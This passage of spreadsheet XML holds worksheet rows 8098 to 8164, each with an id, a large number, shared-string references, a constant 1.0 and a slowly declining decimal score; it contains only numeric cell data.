        <v>0.1392694063926941</v>
      </c>
    </row>
    <row r="8098" ht="15.75" customHeight="1">
      <c r="A8098" s="1">
        <v>463.0</v>
      </c>
      <c r="B8098" s="2">
        <v>1.7302268E7</v>
      </c>
      <c r="C8098" s="2" t="s">
        <v>7694</v>
      </c>
      <c r="D8098" s="2">
        <v>1.0</v>
      </c>
      <c r="E8098" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8098" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="8099" ht="15.75" customHeight="1">
      <c r="A8099" s="1">
        <v>20467.0</v>
      </c>
      <c r="B8099" s="2">
        <v>1.277622E7</v>
      </c>
      <c r="C8099" s="2" t="s">
        <v>7695</v>
      </c>
      <c r="D8099" s="2">
        <v>1.0</v>
      </c>
      <c r="E8099" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8099" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="8100" ht="15.75" customHeight="1">
      <c r="A8100" s="1">
        <v>2938.0</v>
      </c>
      <c r="B8100" s="2">
        <v>3.5952105E7</v>
      </c>
      <c r="C8100" s="2" t="s">
        <v>7696</v>
      </c>
      <c r="D8100" s="2">
        <v>1.0</v>
      </c>
      <c r="E8100" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8100" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="8101" ht="15.75" customHeight="1">
      <c r="A8101" s="1">
        <v>4007.0</v>
      </c>
      <c r="B8101" s="2">
        <v>4.0915738E7</v>
      </c>
      <c r="C8101" s="2" t="s">
        <v>7697</v>
      </c>
      <c r="D8101" s="2">
        <v>1.0</v>
      </c>
      <c r="E8101" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8101" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="8102" ht="15.75" customHeight="1">
      <c r="A8102" s="1">
        <v>6354.0</v>
      </c>
      <c r="B8102" s="2">
        <v>4.8321492E7</v>
      </c>
      <c r="C8102" s="2" t="s">
        <v>7698</v>
      </c>
      <c r="D8102" s="2">
        <v>1.0</v>
      </c>
      <c r="E8102" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8102" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="8103" ht="15.75" customHeight="1">
      <c r="A8103" s="1">
        <v>9228.0</v>
      </c>
      <c r="B8103" s="2">
        <v>5.5449654E7</v>
      </c>
      <c r="C8103" s="2" t="s">
        <v>7699</v>
      </c>
      <c r="D8103" s="2">
        <v>1.0</v>
      </c>
      <c r="E8103" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8103" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="8104" ht="15.75" customHeight="1">
      <c r="A8104" s="1">
        <v>11697.0</v>
      </c>
      <c r="B8104" s="2">
        <v>2.3479052E7</v>
      </c>
      <c r="C8104" s="2" t="s">
        <v>7700</v>
      </c>
      <c r="D8104" s="2">
        <v>1.0</v>
      </c>
      <c r="E8104" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8104" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="8105" ht="15.75" customHeight="1">
      <c r="A8105" s="1">
        <v>13323.0</v>
      </c>
      <c r="B8105" s="2">
        <v>3.4611256E7</v>
      </c>
      <c r="C8105" s="2" t="s">
        <v>7701</v>
      </c>
      <c r="D8105" s="2">
        <v>1.0</v>
      </c>
      <c r="E8105" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8105" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="8106" ht="15.75" customHeight="1">
      <c r="A8106" s="1">
        <v>4449.0</v>
      </c>
      <c r="B8106" s="2">
        <v>4.2402349E7</v>
      </c>
      <c r="C8106" s="2" t="s">
        <v>7702</v>
      </c>
      <c r="D8106" s="2">
        <v>1.0</v>
      </c>
      <c r="E8106" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8106" s="2">
        <v>0.1384479717813052</v>
      </c>
    </row>
    <row r="8107" ht="15.75" customHeight="1">
      <c r="A8107" s="1">
        <v>5269.0</v>
      </c>
      <c r="B8107" s="2">
        <v>4.5147927E7</v>
      </c>
      <c r="C8107" s="2" t="s">
        <v>7703</v>
      </c>
      <c r="D8107" s="2">
        <v>1.0</v>
      </c>
      <c r="E8107" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8107" s="2">
        <v>0.1384479717813052</v>
      </c>
    </row>
    <row r="8108" ht="15.75" customHeight="1">
      <c r="A8108" s="1">
        <v>24368.0</v>
      </c>
      <c r="B8108" s="2">
        <v>1.074267E7</v>
      </c>
      <c r="C8108" s="2" t="s">
        <v>7704</v>
      </c>
      <c r="D8108" s="2">
        <v>1.0</v>
      </c>
      <c r="E8108" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8108" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="8109" ht="15.75" customHeight="1">
      <c r="A8109" s="1">
        <v>4779.0</v>
      </c>
      <c r="B8109" s="2">
        <v>4.3439879E7</v>
      </c>
      <c r="C8109" s="2" t="s">
        <v>7705</v>
      </c>
      <c r="D8109" s="2">
        <v>1.0</v>
      </c>
      <c r="E8109" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8109" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8110" ht="15.75" customHeight="1">
      <c r="A8110" s="1">
        <v>6169.0</v>
      </c>
      <c r="B8110" s="2">
        <v>4.7884357E7</v>
      </c>
      <c r="C8110" s="2" t="s">
        <v>7706</v>
      </c>
      <c r="D8110" s="2">
        <v>1.0</v>
      </c>
      <c r="E8110" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8110" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8111" ht="15.75" customHeight="1">
      <c r="A8111" s="1">
        <v>6286.0</v>
      </c>
      <c r="B8111" s="2">
        <v>4.8169208E7</v>
      </c>
      <c r="C8111" s="2" t="s">
        <v>7707</v>
      </c>
      <c r="D8111" s="2">
        <v>1.0</v>
      </c>
      <c r="E8111" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8111" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8112" ht="15.75" customHeight="1">
      <c r="A8112" s="1">
        <v>7660.0</v>
      </c>
      <c r="B8112" s="2">
        <v>5.1806432E7</v>
      </c>
      <c r="C8112" s="2" t="s">
        <v>7708</v>
      </c>
      <c r="D8112" s="2">
        <v>1.0</v>
      </c>
      <c r="E8112" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8112" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8113" ht="15.75" customHeight="1">
      <c r="A8113" s="1">
        <v>14737.0</v>
      </c>
      <c r="B8113" s="2">
        <v>4.0697379E7</v>
      </c>
      <c r="C8113" s="2" t="s">
        <v>7709</v>
      </c>
      <c r="D8113" s="2">
        <v>1.0</v>
      </c>
      <c r="E8113" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8113" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8114" ht="15.75" customHeight="1">
      <c r="A8114" s="1">
        <v>17396.0</v>
      </c>
      <c r="B8114" s="2">
        <v>4.9623541E7</v>
      </c>
      <c r="C8114" s="2" t="s">
        <v>7710</v>
      </c>
      <c r="D8114" s="2">
        <v>1.0</v>
      </c>
      <c r="E8114" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8114" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8115" ht="15.75" customHeight="1">
      <c r="A8115" s="1">
        <v>23864.0</v>
      </c>
      <c r="B8115" s="2">
        <v>8338541.0</v>
      </c>
      <c r="C8115" s="2" t="s">
        <v>7711</v>
      </c>
      <c r="D8115" s="2">
        <v>1.0</v>
      </c>
      <c r="E8115" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8115" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8116" ht="15.75" customHeight="1">
      <c r="A8116" s="1">
        <v>24491.0</v>
      </c>
      <c r="B8116" s="2">
        <v>1.1078818E7</v>
      </c>
      <c r="C8116" s="2" t="s">
        <v>7712</v>
      </c>
      <c r="D8116" s="2">
        <v>1.0</v>
      </c>
      <c r="E8116" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8116" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8117" ht="15.75" customHeight="1">
      <c r="A8117" s="1">
        <v>31484.0</v>
      </c>
      <c r="B8117" s="2">
        <v>5050644.0</v>
      </c>
      <c r="C8117" s="2" t="s">
        <v>7713</v>
      </c>
      <c r="D8117" s="2">
        <v>1.0</v>
      </c>
      <c r="E8117" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8117" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8118" ht="15.75" customHeight="1">
      <c r="A8118" s="1">
        <v>33598.0</v>
      </c>
      <c r="B8118" s="2">
        <v>8338540.0</v>
      </c>
      <c r="C8118" s="2" t="s">
        <v>7711</v>
      </c>
      <c r="D8118" s="2">
        <v>1.0</v>
      </c>
      <c r="E8118" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8118" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="8119" ht="15.75" customHeight="1">
      <c r="A8119" s="1">
        <v>14232.0</v>
      </c>
      <c r="B8119" s="2">
        <v>3.8303215E7</v>
      </c>
      <c r="C8119" s="2" t="s">
        <v>7714</v>
      </c>
      <c r="D8119" s="2">
        <v>1.0</v>
      </c>
      <c r="E8119" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8119" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="8120" ht="15.75" customHeight="1">
      <c r="A8120" s="1">
        <v>17252.0</v>
      </c>
      <c r="B8120" s="2">
        <v>4.911443E7</v>
      </c>
      <c r="C8120" s="2" t="s">
        <v>7715</v>
      </c>
      <c r="D8120" s="2">
        <v>1.0</v>
      </c>
      <c r="E8120" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8120" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="8121" ht="15.75" customHeight="1">
      <c r="A8121" s="1">
        <v>7782.0</v>
      </c>
      <c r="B8121" s="2">
        <v>5.2186399E7</v>
      </c>
      <c r="C8121" s="2" t="s">
        <v>7716</v>
      </c>
      <c r="D8121" s="2">
        <v>1.0</v>
      </c>
      <c r="E8121" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8121" s="2">
        <v>0.1376068376068376</v>
      </c>
    </row>
    <row r="8122" ht="15.75" customHeight="1">
      <c r="A8122" s="1">
        <v>4533.0</v>
      </c>
      <c r="B8122" s="2">
        <v>4.2650209E7</v>
      </c>
      <c r="C8122" s="2" t="s">
        <v>7717</v>
      </c>
      <c r="D8122" s="2">
        <v>1.0</v>
      </c>
      <c r="E8122" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8122" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="8123" ht="15.75" customHeight="1">
      <c r="A8123" s="1">
        <v>6280.0</v>
      </c>
      <c r="B8123" s="2">
        <v>4.8144472E7</v>
      </c>
      <c r="C8123" s="2" t="s">
        <v>7718</v>
      </c>
      <c r="D8123" s="2">
        <v>1.0</v>
      </c>
      <c r="E8123" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8123" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="8124" ht="15.75" customHeight="1">
      <c r="A8124" s="1">
        <v>7785.0</v>
      </c>
      <c r="B8124" s="2">
        <v>5.2191357E7</v>
      </c>
      <c r="C8124" s="2" t="s">
        <v>7719</v>
      </c>
      <c r="D8124" s="2">
        <v>1.0</v>
      </c>
      <c r="E8124" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8124" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="8125" ht="15.75" customHeight="1">
      <c r="A8125" s="1">
        <v>27303.0</v>
      </c>
      <c r="B8125" s="2">
        <v>2.1355653E7</v>
      </c>
      <c r="C8125" s="2" t="s">
        <v>7637</v>
      </c>
      <c r="D8125" s="2">
        <v>1.0</v>
      </c>
      <c r="E8125" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8125" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="8126" ht="15.75" customHeight="1">
      <c r="A8126" s="1">
        <v>12725.0</v>
      </c>
      <c r="B8126" s="2">
        <v>3.092279E7</v>
      </c>
      <c r="C8126" s="2" t="s">
        <v>7720</v>
      </c>
      <c r="D8126" s="2">
        <v>1.0</v>
      </c>
      <c r="E8126" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8126" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="8127" ht="15.75" customHeight="1">
      <c r="A8127" s="1">
        <v>13911.0</v>
      </c>
      <c r="B8127" s="2">
        <v>3.709805E7</v>
      </c>
      <c r="C8127" s="2" t="s">
        <v>7721</v>
      </c>
      <c r="D8127" s="2">
        <v>1.0</v>
      </c>
      <c r="E8127" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8127" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="8128" ht="15.75" customHeight="1">
      <c r="A8128" s="1">
        <v>19578.0</v>
      </c>
      <c r="B8128" s="2">
        <v>5.6151652E7</v>
      </c>
      <c r="C8128" s="2" t="s">
        <v>7722</v>
      </c>
      <c r="D8128" s="2">
        <v>1.0</v>
      </c>
      <c r="E8128" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8128" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="8129" ht="15.75" customHeight="1">
      <c r="A8129" s="1">
        <v>1817.0</v>
      </c>
      <c r="B8129" s="2">
        <v>2.9234536E7</v>
      </c>
      <c r="C8129" s="2" t="s">
        <v>7723</v>
      </c>
      <c r="D8129" s="2">
        <v>1.0</v>
      </c>
      <c r="E8129" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8129" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="8130" ht="15.75" customHeight="1">
      <c r="A8130" s="1">
        <v>8316.0</v>
      </c>
      <c r="B8130" s="2">
        <v>5.3622845E7</v>
      </c>
      <c r="C8130" s="2" t="s">
        <v>7724</v>
      </c>
      <c r="D8130" s="2">
        <v>1.0</v>
      </c>
      <c r="E8130" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8130" s="2">
        <v>0.1368312757201646</v>
      </c>
    </row>
    <row r="8131" ht="15.75" customHeight="1">
      <c r="A8131" s="1">
        <v>29404.0</v>
      </c>
      <c r="B8131" s="2">
        <v>3.2006939E7</v>
      </c>
      <c r="C8131" s="2" t="s">
        <v>7725</v>
      </c>
      <c r="D8131" s="2">
        <v>1.0</v>
      </c>
      <c r="E8131" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8131" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="8132" ht="15.75" customHeight="1">
      <c r="A8132" s="1">
        <v>29723.0</v>
      </c>
      <c r="B8132" s="2">
        <v>3.4496751E7</v>
      </c>
      <c r="C8132" s="2" t="s">
        <v>7726</v>
      </c>
      <c r="D8132" s="2">
        <v>1.0</v>
      </c>
      <c r="E8132" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8132" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="8133" ht="15.75" customHeight="1">
      <c r="A8133" s="1">
        <v>5508.0</v>
      </c>
      <c r="B8133" s="2">
        <v>4.5836528E7</v>
      </c>
      <c r="C8133" s="2" t="s">
        <v>7727</v>
      </c>
      <c r="D8133" s="2">
        <v>1.0</v>
      </c>
      <c r="E8133" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8133" s="2">
        <v>0.1366959064327486</v>
      </c>
    </row>
    <row r="8134" ht="15.75" customHeight="1">
      <c r="A8134" s="1">
        <v>29325.0</v>
      </c>
      <c r="B8134" s="2">
        <v>3.1313843E7</v>
      </c>
      <c r="C8134" s="2" t="s">
        <v>7728</v>
      </c>
      <c r="D8134" s="2">
        <v>1.0</v>
      </c>
      <c r="E8134" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8134" s="2">
        <v>0.1366843033509701</v>
      </c>
    </row>
    <row r="8135" ht="15.75" customHeight="1">
      <c r="A8135" s="1">
        <v>456.0</v>
      </c>
      <c r="B8135" s="2">
        <v>1.7251012E7</v>
      </c>
      <c r="C8135" s="2" t="s">
        <v>7729</v>
      </c>
      <c r="D8135" s="2">
        <v>1.0</v>
      </c>
      <c r="E8135" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8135" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="8136" ht="15.75" customHeight="1">
      <c r="A8136" s="1">
        <v>13358.0</v>
      </c>
      <c r="B8136" s="2">
        <v>3.4755491E7</v>
      </c>
      <c r="C8136" s="2" t="s">
        <v>7730</v>
      </c>
      <c r="D8136" s="2">
        <v>1.0</v>
      </c>
      <c r="E8136" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8136" s="2">
        <v>0.1363636363636363</v>
      </c>
    </row>
    <row r="8137" ht="15.75" customHeight="1">
      <c r="A8137" s="1">
        <v>16841.0</v>
      </c>
      <c r="B8137" s="2">
        <v>4.7906006E7</v>
      </c>
      <c r="C8137" s="2" t="s">
        <v>7731</v>
      </c>
      <c r="D8137" s="2">
        <v>1.0</v>
      </c>
      <c r="E8137" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8137" s="2">
        <v>0.1362847222222223</v>
      </c>
    </row>
    <row r="8138" ht="15.75" customHeight="1">
      <c r="A8138" s="1">
        <v>2360.0</v>
      </c>
      <c r="B8138" s="2">
        <v>3.3194003E7</v>
      </c>
      <c r="C8138" s="2" t="s">
        <v>7732</v>
      </c>
      <c r="D8138" s="2">
        <v>1.0</v>
      </c>
      <c r="E8138" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8138" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8139" ht="15.75" customHeight="1">
      <c r="A8139" s="1">
        <v>3161.0</v>
      </c>
      <c r="B8139" s="2">
        <v>3.7018826E7</v>
      </c>
      <c r="C8139" s="2" t="s">
        <v>7733</v>
      </c>
      <c r="D8139" s="2">
        <v>1.0</v>
      </c>
      <c r="E8139" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8139" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8140" ht="15.75" customHeight="1">
      <c r="A8140" s="1">
        <v>10096.0</v>
      </c>
      <c r="B8140" s="2">
        <v>5.7197445E7</v>
      </c>
      <c r="C8140" s="2" t="s">
        <v>7734</v>
      </c>
      <c r="D8140" s="2">
        <v>1.0</v>
      </c>
      <c r="E8140" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8140" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8141" ht="15.75" customHeight="1">
      <c r="A8141" s="1">
        <v>11410.0</v>
      </c>
      <c r="B8141" s="2">
        <v>2.1649645E7</v>
      </c>
      <c r="C8141" s="2" t="s">
        <v>7735</v>
      </c>
      <c r="D8141" s="2">
        <v>1.0</v>
      </c>
      <c r="E8141" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8141" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8142" ht="15.75" customHeight="1">
      <c r="A8142" s="1">
        <v>13921.0</v>
      </c>
      <c r="B8142" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C8142" s="2" t="s">
        <v>7736</v>
      </c>
      <c r="D8142" s="2">
        <v>1.0</v>
      </c>
      <c r="E8142" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8142" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8143" ht="15.75" customHeight="1">
      <c r="A8143" s="1">
        <v>17667.0</v>
      </c>
      <c r="B8143" s="2">
        <v>5.04558E7</v>
      </c>
      <c r="C8143" s="2" t="s">
        <v>7737</v>
      </c>
      <c r="D8143" s="2">
        <v>1.0</v>
      </c>
      <c r="E8143" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8143" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8144" ht="15.75" customHeight="1">
      <c r="A8144" s="1">
        <v>20221.0</v>
      </c>
      <c r="B8144" s="2">
        <v>1.0766271E7</v>
      </c>
      <c r="C8144" s="2" t="s">
        <v>7738</v>
      </c>
      <c r="D8144" s="2">
        <v>1.0</v>
      </c>
      <c r="E8144" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8144" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8145" ht="15.75" customHeight="1">
      <c r="A8145" s="1">
        <v>20297.0</v>
      </c>
      <c r="B8145" s="2">
        <v>1.1301146E7</v>
      </c>
      <c r="C8145" s="2" t="s">
        <v>7739</v>
      </c>
      <c r="D8145" s="2">
        <v>1.0</v>
      </c>
      <c r="E8145" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8145" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8146" ht="15.75" customHeight="1">
      <c r="A8146" s="1">
        <v>23982.0</v>
      </c>
      <c r="B8146" s="2">
        <v>9115542.0</v>
      </c>
      <c r="C8146" s="2" t="s">
        <v>7740</v>
      </c>
      <c r="D8146" s="2">
        <v>1.0</v>
      </c>
      <c r="E8146" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8146" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8147" ht="15.75" customHeight="1">
      <c r="A8147" s="1">
        <v>24559.0</v>
      </c>
      <c r="B8147" s="2">
        <v>1.1301145E7</v>
      </c>
      <c r="C8147" s="2" t="s">
        <v>7739</v>
      </c>
      <c r="D8147" s="2">
        <v>1.0</v>
      </c>
      <c r="E8147" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8147" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8148" ht="15.75" customHeight="1">
      <c r="A8148" s="1">
        <v>29500.0</v>
      </c>
      <c r="B8148" s="2">
        <v>3.2708482E7</v>
      </c>
      <c r="C8148" s="2" t="s">
        <v>7741</v>
      </c>
      <c r="D8148" s="2">
        <v>1.0</v>
      </c>
      <c r="E8148" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8148" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="8149" ht="15.75" customHeight="1">
      <c r="A8149" s="1">
        <v>12571.0</v>
      </c>
      <c r="B8149" s="2">
        <v>2.998301E7</v>
      </c>
      <c r="C8149" s="2" t="s">
        <v>7742</v>
      </c>
      <c r="D8149" s="2">
        <v>1.0</v>
      </c>
      <c r="E8149" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8149" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="8150" ht="15.75" customHeight="1">
      <c r="A8150" s="1">
        <v>16445.0</v>
      </c>
      <c r="B8150" s="2">
        <v>4.6409958E7</v>
      </c>
      <c r="C8150" s="2" t="s">
        <v>7743</v>
      </c>
      <c r="D8150" s="2">
        <v>1.0</v>
      </c>
      <c r="E8150" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8150" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="8151" ht="15.75" customHeight="1">
      <c r="A8151" s="1">
        <v>12621.0</v>
      </c>
      <c r="B8151" s="2">
        <v>3.0223746E7</v>
      </c>
      <c r="C8151" s="2" t="s">
        <v>7744</v>
      </c>
      <c r="D8151" s="2">
        <v>1.0</v>
      </c>
      <c r="E8151" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8151" s="2">
        <v>0.1359126984126984</v>
      </c>
    </row>
    <row r="8152" ht="15.75" customHeight="1">
      <c r="A8152" s="1">
        <v>12972.0</v>
      </c>
      <c r="B8152" s="2">
        <v>3.2576416E7</v>
      </c>
      <c r="C8152" s="2" t="s">
        <v>7745</v>
      </c>
      <c r="D8152" s="2">
        <v>1.0</v>
      </c>
      <c r="E8152" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8152" s="2">
        <v>0.1358974358974359</v>
      </c>
    </row>
    <row r="8153" ht="15.75" customHeight="1">
      <c r="A8153" s="1">
        <v>2008.0</v>
      </c>
      <c r="B8153" s="2">
        <v>3.0675992E7</v>
      </c>
      <c r="C8153" s="2" t="s">
        <v>7746</v>
      </c>
      <c r="D8153" s="2">
        <v>1.0</v>
      </c>
      <c r="E8153" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8153" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="8154" ht="15.75" customHeight="1">
      <c r="A8154" s="1">
        <v>7886.0</v>
      </c>
      <c r="B8154" s="2">
        <v>5.2429579E7</v>
      </c>
      <c r="C8154" s="2" t="s">
        <v>7747</v>
      </c>
      <c r="D8154" s="2">
        <v>1.0</v>
      </c>
      <c r="E8154" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8154" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="8155" ht="15.75" customHeight="1">
      <c r="A8155" s="1">
        <v>10591.0</v>
      </c>
      <c r="B8155" s="2">
        <v>1.3419799E7</v>
      </c>
      <c r="C8155" s="2" t="s">
        <v>7748</v>
      </c>
      <c r="D8155" s="2">
        <v>1.0</v>
      </c>
      <c r="E8155" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8155" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="8156" ht="15.75" customHeight="1">
      <c r="A8156" s="1">
        <v>7016.0</v>
      </c>
      <c r="B8156" s="2">
        <v>5.0095074E7</v>
      </c>
      <c r="C8156" s="2" t="s">
        <v>7749</v>
      </c>
      <c r="D8156" s="2">
        <v>1.0</v>
      </c>
      <c r="E8156" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8156" s="2">
        <v>0.1355218855218855</v>
      </c>
    </row>
    <row r="8157" ht="15.75" customHeight="1">
      <c r="A8157" s="1">
        <v>1183.0</v>
      </c>
      <c r="B8157" s="2">
        <v>2.4641439E7</v>
      </c>
      <c r="C8157" s="2" t="s">
        <v>7750</v>
      </c>
      <c r="D8157" s="2">
        <v>1.0</v>
      </c>
      <c r="E8157" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8157" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="8158" ht="15.75" customHeight="1">
      <c r="A8158" s="1">
        <v>14852.0</v>
      </c>
      <c r="B8158" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C8158" s="2" t="s">
        <v>7751</v>
      </c>
      <c r="D8158" s="2">
        <v>1.0</v>
      </c>
      <c r="E8158" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8158" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="8159" ht="15.75" customHeight="1">
      <c r="A8159" s="1">
        <v>15586.0</v>
      </c>
      <c r="B8159" s="2">
        <v>4.3442267E7</v>
      </c>
      <c r="C8159" s="5" t="s">
        <v>7752</v>
      </c>
      <c r="D8159" s="2">
        <v>1.0</v>
      </c>
      <c r="E8159" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8159" s="2">
        <v>0.135304659498208</v>
      </c>
    </row>
    <row r="8160" ht="15.75" customHeight="1">
      <c r="A8160" s="1">
        <v>26938.0</v>
      </c>
      <c r="B8160" s="2">
        <v>1.9533612E7</v>
      </c>
      <c r="C8160" s="2" t="s">
        <v>7753</v>
      </c>
      <c r="D8160" s="2">
        <v>1.0</v>
      </c>
      <c r="E8160" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8160" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="8161" ht="15.75" customHeight="1">
      <c r="A8161" s="1">
        <v>212.0</v>
      </c>
      <c r="B8161" s="2">
        <v>1.4573944E7</v>
      </c>
      <c r="C8161" s="2" t="s">
        <v>7754</v>
      </c>
      <c r="D8161" s="2">
        <v>1.0</v>
      </c>
      <c r="E8161" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8161" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="8162" ht="15.75" customHeight="1">
      <c r="A8162" s="1">
        <v>814.0</v>
      </c>
      <c r="B8162" s="2">
        <v>2.1390882E7</v>
      </c>
      <c r="C8162" s="2" t="s">
        <v>7755</v>
      </c>
      <c r="D8162" s="2">
        <v>1.0</v>
      </c>
      <c r="E8162" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8162" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="8163" ht="15.75" customHeight="1">
      <c r="A8163" s="1">
        <v>2114.0</v>
      </c>
      <c r="B8163" s="2">
        <v>3.1368884E7</v>
      </c>
      <c r="C8163" s="2" t="s">
        <v>7756</v>
      </c>
      <c r="D8163" s="2">
        <v>1.0</v>
      </c>
      <c r="E8163" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8163" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="8164" ht="15.75" customHeight="1">
      <c r="A8164" s="1">
        <v>6059.0</v>
      </c>
      <c r="B8164" s="2">
        <v>4.7613459E7</v>
      </c>
      <c r="C8164" s="2" t="s">
        <v>7757</v>
      </c>
      <c r="D8164" s="2">
        <v>1.0</v>
      </c>
      <c r="E8164" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8164" s="2">
        <v>0.1352201257861635</v>
